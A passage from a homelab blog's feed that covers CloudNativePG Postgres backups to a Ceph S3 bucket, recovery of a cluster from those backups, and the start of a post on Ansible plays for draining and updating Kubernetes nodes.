</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>Here, I&rsquo;m using the fact that CloudNativePG adds a label with the Cluster name
to each pod to allow access only to the DB pods.
An example for a Kubernetes NetworkPolicy can be found <a href="https://github.com/cloudnative-pg/cloudnative-pg/blob/main/docs/src/samples/networkpolicy-example.yaml">here</a>.</p>
<p>Before continuing to the backup configuration, here is a warning which worried
me after creating my first cluster:</p>
<pre tabindex="0"><code>&#34;Warning: mismatch architecture between controller and instances. This is an unsupported configuration.&#34;
</code></pre><p>That warning got my attention - I&rsquo;m running most of my workloads on Raspberry
Pi 4, but I also have some x86 machines, just in case I end up with a workload
that doesn&rsquo;t support AArch64.
The really frustrating thing at this point was that, yet again, Google utterly
deserted me. It looked like there were zero hits for the warning message.
Luckily, after some searching of the CloudNativePG repo on GitHub, I found
<a href="https://github.com/cloudnative-pg/cloudnative-pg/issues/3868">this issue</a>. That
then brought me to the realization that multi-arch clusters are currently only
a problem when in-place updates for the instance manager running in the Postgres containers
are needed. But I did not enable those anyway.</p>
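<p>If I ever do want in-place updates, my understanding is that the relevant knob is
the operator&rsquo;s <code>ENABLE_INSTANCE_MANAGER_INPLACE_UPDATES</code> setting, which in the
Helm chart would sit next to the <code>INHERITED_LABELS</code> entry from earlier. I have
not verified this on a multi-arch cluster, so treat it as a note-to-self:</p>
<pre tabindex="0"><code>config:
  data:
    INHERITED_LABELS: homelab/*
    # Stays off in my setup; in-place instance manager updates are what
    # trips up mixed AArch64/x86 clusters according to the linked issue.
    ENABLE_INSTANCE_MANAGER_INPLACE_UPDATES: &#34;false&#34;
</code></pre>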
<h2 id="adding-backups">Adding backups</h2>
<p>Next up: Preventing disaster. For backups, I went with the S3 bucket based
backups, instead of the volume snapshots method. This backup method has two
pieces. The first one is continuous backups of the WAL, and the second is a
regular full backup of the <code>PGDATA</code> directory. More info on the backup methods
can be found in the <a href="https://cloudnative-pg.io/documentation/current/backup/">CloudNativePG docs</a>.</p>
<p>But I hit a snag with my overall setup here. As described in a
<a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/#migrating-backup-buckets">previous article</a>,
I&rsquo;ve got a second stage in my backup where I download all of the backup buckets
onto an external HDD. So I need to give the S3 user used for those external HDD
backups access to all backup buckets. This includes the Postgres backup
bucket. But sadly, Ceph Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>
does not support setting a policy on the new bucket. So instead of using OBCs,
I created a single bucket in Ansible. Then I will use Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/CRDs/Object-Storage/ceph-object-store-user-crd/">CephObjectStoreUser</a>
to create the S3 user, separately for each Postgres cluster/Namespace. This will
generate a Secret with the necessary credentials to access the bucket, which I
can then use to configure the CloudNativePG backup.</p>
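<p>A CephObjectStoreUser for the Keycloak cluster would look roughly like this. The
store name is inferred from the Secret and endpoint names shown further down, so
double-check it, and the namespace it lives in, against your own Rook setup:</p>
<pre tabindex="0"><code>apiVersion: ceph.rook.io/v1
kind: CephObjectStoreUser
metadata:
  name: cnpg-backup-keycloak
spec:
  # The object store this user belongs to
  store: rgw-bulk
  displayName: CNPG backup user for the Keycloak cluster
</code></pre>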
<p>Here again, I&rsquo;m pretty happy with what I was able to do in the Ansible playbook.
Here is the play which creates my backup buckets, together with the task for
the Postgres backup bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the backup buckets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;S3 access key id here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;S3 secret access key here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cnpg_backup_users</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create cnpg backup bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">cnpg</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-cnpg</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;ansible.builtin.template&#39;,&#39;bucket-policies/backup-cnpg.json.template&#39;) }}&#34;</span>
</span></span></code></pre></div><p>Important to note here is the <code>cnpg_backup_users</code> list, which contains all the
users for the CloudNativePG clusters to be backed up. Right now, only the Keycloak
test setup. Here is the bucket policy referenced in the <code>policy</code> key:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>{<span style="color:#960050;background-color:#1e0010">%</span> <span style="color:#960050;background-color:#1e0010">for</span> <span style="color:#960050;background-color:#1e0010">user</span> <span style="color:#960050;background-color:#1e0010">in</span> <span style="color:#960050;background-color:#1e0010">cnpg_backup_users</span> <span style="color:#960050;background-color:#1e0010">%</span>}
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/{{ user }}-pg-cluster/*&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/{{ user }}-pg-cluster&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:iam:::user/cnpg-backup-{{ user }}&#34;</span>
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>{<span style="color:#960050;background-color:#1e0010">%</span> <span style="color:#960050;background-color:#1e0010">endfor</span> <span style="color:#960050;background-color:#1e0010">%</span>}
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/extern-backups-s3&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This policy grants each DB backup user access only to certain subdirectories,
namely <code>$USERNAME-pg-cluster/</code>, as by default, CloudNativePG puts the backups
of different clusters into subdirectories named after each Cluster&rsquo;s <code>metadata.name</code>.</p>
<p>The CloudNativePG backup config itself then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;90d&#34;</span>
</span></span></code></pre></div><p>This is put under <code>spec</code> in the <code>Cluster</code> manifest. This config tells
CloudNativePG how to access the S3 backup bucket, and that all data should be
retained for 90 days. This is going to be true for both WALs and full <code>PGDATA</code>
backups.</p>
<p>After this update is made to the Cluster manifest, you might see this error
message in the logs:</p>
<pre tabindex="0"><code>&#34;error&#34;:&#34;while getting secret rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak: secrets \&#34;rook-ceph-object-use
r-rgw-bulk-cnpg-backup-keycloak\&#34; is forbidden: User \&#34;system:serviceaccount:testsetup:keycloak-pg-cluster\&#34; cannot get resource \&#34;secrets\&#34; in API group \&#34;\&#34; in the namespace \&#34;testsetup\&#34;&#34;
</code></pre><p>Don&rsquo;t be alarmed by it; it just seemed to be a transient error which went away
on its own.</p>
<p>After a couple of moments, CloudNativePG should start streaming the WALs to
the S3 bucket already. For this example, the path in the bucket looks like this:</p>
<pre tabindex="0"><code>s3://backup-cnpg/keycloak-pg-cluster/wals/
</code></pre><p>I like the fact that CloudNativePG doesn&rsquo;t just assume that the cluster has the
entire bucket to itself, but instead puts the data into a directory under the
root, allowing me to put the backups of all the clusters into the same bucket.</p>
<p>But the WALs are only part of the backup. The second part is the full <code>PGDATA</code>
backup, and that&rsquo;s done via a <a href="https://cloudnative-pg.io/documentation/current/cloudnative-pg.v1/#postgresql-cnpg-io-v1-ScheduledBackup">ScheduledBackup</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 0 0 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span></code></pre></div><p>This runs a backup every day at exactly midnight. The <code>immediate: true</code> config
tells CloudNativePG to run the first backup right after the ScheduledBackup is
created, instead of waiting for the next scheduled run. This is another one of those
nice little features, avoiding the typical futzing with the schedule to make
it start a backup in five minutes just for testing.</p>
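<p>On top of the schedule, the docs also describe an on-demand variant: a plain
<code>Backup</code> resource, handy for kicking off a one-off backup before risky changes.
A minimal sketch for this cluster:</p>
<pre tabindex="0"><code>apiVersion: postgresql.cnpg.io/v1
kind: Backup
metadata:
  name: keycloak-manual-backup
spec:
  method: barmanObjectStore
  cluster:
    name: keycloak-pg-cluster
</code></pre>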
<h2 id="recovery">Recovery</h2>
<p>And finally, let&rsquo;s have a look at how to use the previously created backups
to create a new cluster, as an example of a post-incident recovery operation.</p>
<p>It&rsquo;s important here that while I deleted the old Cluster completely, I left the
S3 bucket user and its associated secret. That&rsquo;s needed so CloudNativePG can use
those credentials to get at the data from the old cluster.</p>
<p>Recovery itself is pretty straightforward. Instead of adding a <code>bootstrap.initdb</code>
key, the <code>bootstrap.recovery</code> key is used, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">recovery</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">source</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span></code></pre></div><p>The <code>database</code> and <code>owner</code> keys need to be set. Without them, CloudNativePG will
read in the old database from the backups, but it will also create the default
<code>app</code> database, and create new Secrets for that DB, instead of the restored <code>keycloak</code>
DB.</p>
<p>The <code>source: keycloak-pg-cluster</code> references an entry in the <code>externalClusters</code>
section, which looks almost like the <code>backup:</code> section of the original cluster&rsquo;s
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">externalClusters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span></code></pre></div><p>Here again, CloudNativePG will assume that the backups are stored under the
<code>name</code> of the cluster in the bucket. The restore with this config worked without
issue and after it was done, I saw my previously created test realm and users
again in Keycloak.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Phew. Okay. This setup took way longer than I had initially thought, mostly
because I almost jumped ship after the initial research and finding out that
it doesn&rsquo;t really support multi-DB clusters. And also because I ended up deciding
that I would like to get hands on with the recovery procedure before I actually
need it.</p>
<p>One of the potential downsides is that, just by virtue of running multiple
clusters, it will very likely need more resources than my current single-cluster
setup.
I&rsquo;m still not too happy with the backups. I would have preferred something closer
to restic, at least with deduplication. I will probably at least enable
compression by default at some point, to save on storage space on the S3 bucket.</p>
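<p>From what I can see in the <code>barmanObjectStore</code> options, compression should just
be two extra keys under the existing <code>backup</code> section, something like this
(untested on my side):</p>
<pre tabindex="0"><code>  backup:
    barmanObjectStore:
      # gzip is the conservative choice; bzip2 and snappy should also be available
      wal:
        compression: gzip
      data:
        compression: gzip
</code></pre>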
<p>Then again, let&rsquo;s be honest here: Complexity is sort of the goal. &#x1f913;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 7: Ansible Plays for Host Updates</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-7-node-updates/</link>
      <pubDate>Sat, 17 Feb 2024 22:45:46 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-7-node-updates/</guid>
      <description>It really needs to be automated</description>
      <content:encoded><![CDATA[<p>Wherein I add the Kubernetes nodes to my host update Ansible playbook.</p>
<p>This is part eight of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>With the number of hosts I&rsquo;ve now got in my Homelab, I definitely need a better
way to update them than manually SSH&rsquo;ing into each. So a while ago, I created
an Ansible playbook to update all hosts in my Homelab. These updates are also
one of the reasons I keep so many physical hosts, even if they&rsquo;re individually
relatively small: I want an environment where I can take down any given host
for updates without anything at all breaking, and especially without having to
take the entire lab down for a regular host update.</p>
<p>My node updates need to execute the following sequence (a rough sketch of most of
these steps as Ansible tasks follows the list):</p>
<ol>
<li>Drain all Pods from the node</li>
<li>Run <code>apt update</code></li>
<li>Run <code>apt upgrade</code></li>
<li>Reboot the machine</li>
<li>Uncordon the machine</li>
<li>Run <code>apt autoremove</code></li>
</ol>
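<p>The drain step is the interesting one and gets its own discussion below, but the
apt and reboot steps map pretty directly onto standard Ansible modules. A sketch
of those tasks, with the uncordon mirroring the drain command shown later:</p>
<pre tabindex="0"><code>- name: apt update and upgrade
  ansible.builtin.apt:
    update_cache: true
    upgrade: dist

- name: reboot the machine
  ansible.builtin.reboot:
    reboot_timeout: 600

- name: uncordon node
  delegate_to: cnc
  become_user: my_user
  command:
    argv:
      - /home/my_user/.local/bin/kubectl
      - uncordon
      - &#34;{{ ansible_hostname }}&#34;

- name: apt autoremove
  ansible.builtin.apt:
    autoremove: true
</code></pre>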
<p>I&rsquo;ve got a couple of different classes of nodes in my Homelab, but I will
concentrate only on those related to k8s in this post:</p>
<ol>
<li>Control plane nodes. These run the kubeadm control plane Pods and Ceph MONs.</li>
<li>Ceph nodes. These run the Ceph OSDs providing storage to the Homelab and some
other Ceph services.</li>
<li>Worker nodes. Those run my Kubernetes workloads.</li>
</ol>
<p>All three require some alterations to the above sequence of steps. Each class
of node has its own play, and the plays all run in sequence, not in parallel
to each other, to ensure stability of the overall cluster. I&rsquo;m reasonably sure
that with some fancy footwork, I could probably run them in parallel as well.
But the main goal of this setup is that I enter a single command, and then I
can do something completely different, without having to babysit the update.
If it takes an hour longer but I can just go and read something while it&rsquo;s
running, that&rsquo;s an okay trade-off for me. Those of you following me on Mastodon
can probably tell when my update Fridays are just by the volume of posts I make
on those evenings. &#x1f605;</p>
<p>The first difference between the plays for each class of node is the parallelism
within them. For this, I&rsquo;m using Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/linear_strategy.html">Linear Strategy</a>.
Both the control plane and Ceph nodes run with <code>serial: 1</code>, to make sure there
are always enough nodes up to keep the Homelab chugging along.
The worker nodes on the other hand are allowed to run with <code>serial: 2</code>, updating
two hosts in parallel, as I should have enough slack in the cluster to keep at
least most things running even with two fewer nodes.</p>
<p>For draining the nodes, I initially used the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/k8s_drain_module.html">k8s_drain_module</a>.
But I had a problem with that one, namely getting <code>too many requests</code> errors:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fatal: <span style="color:#f92672">[</span>node1 -&gt; cnc<span style="color:#f92672">]</span>: FAILED! <span style="color:#f92672">=</span>&gt; <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;changed&#34;</span>: false, <span style="color:#e6db74">&#34;msg&#34;</span>: <span style="color:#e6db74">&#34;Failed to delete pod rook-cluster/rook-ceph-osd-1-7977658495-nt6ps due to: Too Many Requests&#34;</span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>I didn&rsquo;t always get the error. Sometimes it just worked. And I&rsquo;m not 100% sure
what the trigger is. After spending quite a while googling, I&rsquo;m still not
sure where those errors even come from, whether it&rsquo;s the kube-apiserver
returning them or whether it has something to do with, for example, Pod
Disruption Budgets. I then switched to executing <code>kubectl</code> via the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/command_module.html">command module</a>.
This worked without issue. The task for draining a node looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span></code></pre></div><p>You need to supply the absolute path to the <code>kubectl</code> binary, as this runs
a command directly, not inside a shell, so no PATH extensions and the like.
I&rsquo;m also delegating this task to my Command &amp; Control host. This is the only
machine with Kubernetes certs. The <code>--delete-emptydir-data=true</code> is needed
because Cilium uses <a href="https://kubernetes.io/docs/concepts/storage/volumes/#emptydir">emptyDir</a>
for some temporary storage, and without it, the drain fails.
The <code>--force</code> flag lets the drain go through even when there are Pods on the node
that aren&rsquo;t managed by a controller like a Deployment or StatefulSet. Finally, <code>--ignore-daemonsets</code>
is necessary so the drain doesn&rsquo;t abort because of DaemonSet Pods, which can&rsquo;t be
evicted and which in my case include for example the Fluentbit log shipper.</p>
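<p>For reference, the module-based variant of that drain task would look roughly like
the sketch below. This is not a copy of the task I actually had; the <code>delete_options</code>
names are taken from the <code>kubernetes.core.k8s_drain</code> docs and mirror the <code>kubectl</code>
flags above:</p>
<pre tabindex="0"><code># sketch only: a k8s_drain-based drain task, mirroring the kubectl flags above
- name: drain node (module variant)
  delegate_to: cnc
  become_user: my_user
  kubernetes.core.k8s_drain:
    name: "{{ ansible_hostname }}"
    state: drain
    delete_options:
      force: true
      ignore_daemonsets: true
      delete_emptydir_data: true
</code></pre>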
<p>The full play for my worker nodes looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes worker nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
